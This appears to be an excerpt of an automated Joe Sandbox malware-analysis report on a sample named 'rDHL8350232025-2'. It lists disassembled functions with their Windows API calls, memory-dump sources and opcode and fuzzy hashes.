                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Rect$Client$Window$Screen
                                                                                      • String ID:
                                                                                      • API String ID: 1296646539-0
                                                                                      • Opcode ID: 0698ec5e8c03b4ed0f633db73fcf6e80661079cb98a41d1c379efd742fb21d23
                                                                                      • Instruction ID: a2683ce77ea0532d100ed37fc500bb3238098f41cc69d07f8700c9d991b65f86
                                                                                      • Opcode Fuzzy Hash: 0698ec5e8c03b4ed0f633db73fcf6e80661079cb98a41d1c379efd742fb21d23
                                                                                      • Instruction Fuzzy Hash: EDB18B35A0074ADBDB64CFA8C8807EEB7F5FF48311F14841AE8A9D7260DB34AA51DB54
                                                                                      Function 000601B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __allrem.LIBCMT ref: 000600BA
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000600D6
                                                                                      • __allrem.LIBCMT ref: 000600ED
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0006010B
                                                                                      • __allrem.LIBCMT ref: 00060122
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00060140
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                      • String ID:
                                                                                      • API String ID: 1992179935-0
                                                                                      • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                      • Instruction ID: 4d77bd61b663accc678d9751e3a0c2552aca8d2d12cd9714b42d5fc2f3f33ec9
                                                                                      • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                      • Instruction Fuzzy Hash: 83811872A40706ABE7209F78CC41BAB73EAAF41324F24453EF955DB6C2E774D9448790
                                                                                      Function 000661FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,000582D9,000582D9,?,?,?,0006644F,00000001,00000001,8BE85006), ref: 00066258
                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0006644F,00000001,00000001,8BE85006,?,?,?), ref: 000662DE
                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 000663D8
                                                                                      • __freea.LIBCMT ref: 000663E5
                                                                                        • Part of subcall function 00063820: RtlAllocateHeap.NTDLL(00000000,?,00101444,?,0004FDF5,?,?,0003A976,00000010,00101440,000313FC,?,000313C6,?,00031129), ref: 00063852
                                                                                      • __freea.LIBCMT ref: 000663EE
                                                                                      • __freea.LIBCMT ref: 00066413
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1414292761-0
                                                                                      • Opcode ID: 8ce244acdae8ed960616c08ff98aff6047be5804d1efdbec35df3e6c98a7257d
                                                                                      • Instruction ID: cbd1560ff7d8335ab52a44faf572cce14d657d990a7c445426dcce90d317b4bf
                                                                                      • Opcode Fuzzy Hash: 8ce244acdae8ed960616c08ff98aff6047be5804d1efdbec35df3e6c98a7257d
                                                                                      • Instruction Fuzzy Hash: E551D372A00226ABEB258F64CC81EBF77ABEF45750F154629FD05D7241EB36DE40C6A0
                                                                                      Function 000BBBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                        • Part of subcall function 000BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000BB6AE,?,?), ref: 000BC9B5
                                                                                        • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BC9F1
                                                                                        • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BCA68
                                                                                        • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BCA9E
                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000BBCCA
                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000BBD25
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 000BBD6A
                                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 000BBD99
                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 000BBDF3
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 000BBDFF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                      • String ID:
                                                                                      • API String ID: 1120388591-0
                                                                                      • Opcode ID: 18e737826e27d67658f15d91551768533e1785b4b5b89e36bb351386182c99e1
                                                                                      • Instruction ID: 099fe6a70b12a000cc99c8976a5b00bd5e6bc0e47a73931a6dab04a9ab4f19fd
                                                                                      • Opcode Fuzzy Hash: 18e737826e27d67658f15d91551768533e1785b4b5b89e36bb351386182c99e1
                                                                                      • Instruction Fuzzy Hash: DA81D270208241EFD715DF24C885EAABBE9FF84308F54895CF4994B2A2DB71ED45CB92
                                                                                      Function 0008F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VariantInit.OLEAUT32(00000035), ref: 0008F7B9
                                                                                      • SysAllocString.OLEAUT32(00000001), ref: 0008F860
                                                                                      • VariantCopy.OLEAUT32(0008FA64,00000000), ref: 0008F889
                                                                                      • VariantClear.OLEAUT32(0008FA64), ref: 0008F8AD
                                                                                      • VariantCopy.OLEAUT32(0008FA64,00000000), ref: 0008F8B1
                                                                                      • VariantClear.OLEAUT32(?), ref: 0008F8BB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearCopy$AllocInitString
                                                                                      • String ID:
                                                                                      • API String ID: 3859894641-0
                                                                                      • Opcode ID: 311b66a3147e2588892b091dfafa406631ecda136271ffa06cb45d3b940614fa
                                                                                      • Instruction ID: 0051a7dd34c2c9868658e2387f5309169dac5853808b4ca6d963b30d50a391cc
                                                                                      • Opcode Fuzzy Hash: 311b66a3147e2588892b091dfafa406631ecda136271ffa06cb45d3b940614fa
                                                                                      • Instruction Fuzzy Hash: E351D131600312BADF24BB75D895B7DB3A9FF45310F208466E986DF292DB708C40CBA6
                                                                                      Function 000A910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00037620: _wcslen.LIBCMT ref: 00037625
                                                                                        • Part of subcall function 00036B57: _wcslen.LIBCMT ref: 00036B6A
                                                                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 000A94E5
                                                                                      • _wcslen.LIBCMT ref: 000A9506
                                                                                      • _wcslen.LIBCMT ref: 000A952D
                                                                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 000A9585
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$FileName$OpenSave
                                                                                      • String ID: X
                                                                                      • API String ID: 83654149-3081909835
                                                                                      • Opcode ID: c739a39d848a5bd30b890bd5b1cfab0d0f1d0eb17e105bdf935b65f98501a385
                                                                                      • Instruction ID: ed5105caf5386126a1abee5de1267f72daf6515aec977b47cfae8dc4ee114f6c
                                                                                      • Opcode Fuzzy Hash: c739a39d848a5bd30b890bd5b1cfab0d0f1d0eb17e105bdf935b65f98501a385
                                                                                      • Instruction Fuzzy Hash: 39E1A271A083019FD725DF64C881BAEB7E4BF85314F14896DF8899B2A2DB31DD05CB92
                                                                                      Function 0004920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                                                                      • BeginPaint.USER32(?,?,?), ref: 00049241
                                                                                      • GetWindowRect.USER32(?,?), ref: 000492A5
                                                                                      • ScreenToClient.USER32(?,?), ref: 000492C2
                                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 000492D3
                                                                                      • EndPaint.USER32(?,?,?,?,?), ref: 00049321
                                                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 000871EA
                                                                                        • Part of subcall function 00049339: BeginPath.GDI32(00000000), ref: 00049357
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                      • String ID:
                                                                                      • API String ID: 3050599898-0
                                                                                      • Opcode ID: 77dd61041869993c5964b6a6384827e8594cc69771c22a3ee08f7fabbb63dd20
                                                                                      • Instruction ID: 084ac152a72a7c5693e5d0b2cfd33a2f6bc65c65f329fd1059e8369fb663974f
                                                                                      • Opcode Fuzzy Hash: 77dd61041869993c5964b6a6384827e8594cc69771c22a3ee08f7fabbb63dd20
                                                                                      • Instruction Fuzzy Hash: B8419F70104200AFE721DF24CC88FAB7BE8FB4A325F140679F998876A2C7759985DB61
                                                                                      Function 000A07EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 000A080C
                                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 000A0847
                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 000A0863
                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 000A08DC
                                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 000A08F3
                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 000A0921
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                      • String ID:
                                                                                      • API String ID: 3368777196-0
                                                                                      • Opcode ID: 4f882486d06a1cb7e686c8384425643d1226456533b61cc18896f8db54cf3d2b
                                                                                      • Instruction ID: 71259f09b0bc7c67c83d5b6d8c6510bc64e90561b43ce635db7e6e8edfdcf5cc
                                                                                      • Opcode Fuzzy Hash: 4f882486d06a1cb7e686c8384425643d1226456533b61cc18896f8db54cf3d2b
                                                                                      • Instruction Fuzzy Hash: EF417C71900209EFEF149F94DC85AAAB7B8FF05310F1440B9ED049A297DB34DE65DBA4
                                                                                      Function 00094C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • IsWindowVisible.USER32(?), ref: 00094C95
                                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00094CB2
                                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00094CEA
                                                                                      • _wcslen.LIBCMT ref: 00094D08
                                                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00094D10
                                                                                      • _wcsstr.LIBVCRUNTIME ref: 00094D1A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                      • String ID:
                                                                                      • API String ID: 72514467-0
                                                                                      • Opcode ID: 05d782d67f21562f6d7b48a65d0946b8b92ed2e062514894d24145849c61c914
                                                                                      • Instruction ID: e5fb9e37c81d5dd5043aaecb2a0de297d0f4b1db03d7578f3acb23c3500075d8
                                                                                      • Opcode Fuzzy Hash: 05d782d67f21562f6d7b48a65d0946b8b92ed2e062514894d24145849c61c914
                                                                                      • Instruction Fuzzy Hash: E3210476205200BBFF655B29ED49E7F7BD8DF45750F108039F809CA192EA75CC42A6A0
                                                                                      Function 000A581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00033AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00033A97,?,?,00032E7F,?,?,?,00000000), ref: 00033AC2
                                                                                      • _wcslen.LIBCMT ref: 000A587B
                                                                                      • CoInitialize.OLE32(00000000), ref: 000A5995
                                                                                      • CoCreateInstance.OLE32(000CFCF8,00000000,00000001,000CFB68,?), ref: 000A59AE
                                                                                      • CoUninitialize.OLE32 ref: 000A59CC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                      • String ID: .lnk
                                                                                      • API String ID: 3172280962-24824748
                                                                                      • Opcode ID: d8f0e2c173a8407b7911d779ff82c73e2a62ab2aa10b8e4a9438bbb2b7cb37dd
                                                                                      • Instruction ID: e5a5d98775eef7b89711e8b605d24676225dbd06c237bf0208f07ba436b9074d
                                                                                      • Opcode Fuzzy Hash: d8f0e2c173a8407b7911d779ff82c73e2a62ab2aa10b8e4a9438bbb2b7cb37dd
                                                                                      • Instruction Fuzzy Hash: EBD173756087019FC714DF64C880A6ABBE5FF8A712F14885DF8899B362DB31EC45CB92
                                                                                      Function 0009175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00090FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00090FCA
                                                                                        • Part of subcall function 00090FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00090FD6
                                                                                        • Part of subcall function 00090FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00090FE5
                                                                                        • Part of subcall function 00090FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00090FEC
                                                                                        • Part of subcall function 00090FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00091002
                                                                                      • GetLengthSid.ADVAPI32(?,00000000,00091335), ref: 000917AE
                                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 000917BA
                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 000917C1
                                                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 000917DA
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,00091335), ref: 000917EE
                                                                                      • HeapFree.KERNEL32(00000000), ref: 000917F5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                      • String ID:
                                                                                      • API String ID: 3008561057-0
                                                                                      • Opcode ID: ce6b420bc5b2197d253a9f286765d9465857605c13af4b8b7097f30153f19abe
                                                                                      • Instruction ID: 571de6aa6e5702d74064996e85e3836c0b7797af20140c2c6ee086486bb4977c
                                                                                      • Opcode Fuzzy Hash: ce6b420bc5b2197d253a9f286765d9465857605c13af4b8b7097f30153f19abe
                                                                                      • Instruction Fuzzy Hash: 57119A32604206EFEF109FA5CC49FEEBBB9EB42355F144058F84597220C739A940EB60
                                                                                      Function 000914CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 000914FF
                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00091506
                                                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00091515
                                                                                      • CloseHandle.KERNEL32(00000004), ref: 00091520
                                                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0009154F
                                                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00091563
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                      • String ID:
                                                                                      • API String ID: 1413079979-0
                                                                                      • Opcode ID: ebd549cd64be38eda69fdd15b5c56242c558374d07258c81bdb7fec0affbd9d5
                                                                                      • Instruction ID: e0e0519a718c4bcd2fdf7093feaa0ee62edd3b42f16e3935530ea7ca74711e36
                                                                                      • Opcode Fuzzy Hash: ebd549cd64be38eda69fdd15b5c56242c558374d07258c81bdb7fec0affbd9d5
                                                                                      • Instruction Fuzzy Hash: 8D11297260024AEBEF118F98ED49FDE7BA9FF48744F154115FA09A2060C375CE61EB60
                                                                                      Function 00053382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,00053379,00052FE5), ref: 00053390
                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0005339E
                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 000533B7
                                                                                      • SetLastError.KERNEL32(00000000,?,00053379,00052FE5), ref: 00053409
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                      • String ID:
                                                                                      • API String ID: 3852720340-0
                                                                                      • Opcode ID: 778434e4e4f06dd8d2eb4f22cf8adf9d19768b67d9a1dba9bbd97dfec62c4c4a
                                                                                      • Instruction ID: cea13594802ff829677e8b4cf21a98ea1902eabdaf47cef0922292eaa048adc5
                                                                                      • Opcode Fuzzy Hash: 778434e4e4f06dd8d2eb4f22cf8adf9d19768b67d9a1dba9bbd97dfec62c4c4a
                                                                                      • Instruction Fuzzy Hash: 7801F532609315AEF72527747D8ADA72A94DB053FB320422DFD10851F1EF154E0AA548
                                                                                      Function 00062D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,00065686,00073CD6,?,00000000,?,00065B6A,?,?,?,?,?,0005E6D1,?,000F8A48), ref: 00062D78
                                                                                      • _free.LIBCMT ref: 00062DAB
                                                                                      • _free.LIBCMT ref: 00062DD3
                                                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,0005E6D1,?,000F8A48,00000010,00034F4A,?,?,00000000,00073CD6), ref: 00062DE0
                                                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,0005E6D1,?,000F8A48,00000010,00034F4A,?,?,00000000,00073CD6), ref: 00062DEC
                                                                                      • _abort.LIBCMT ref: 00062DF2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
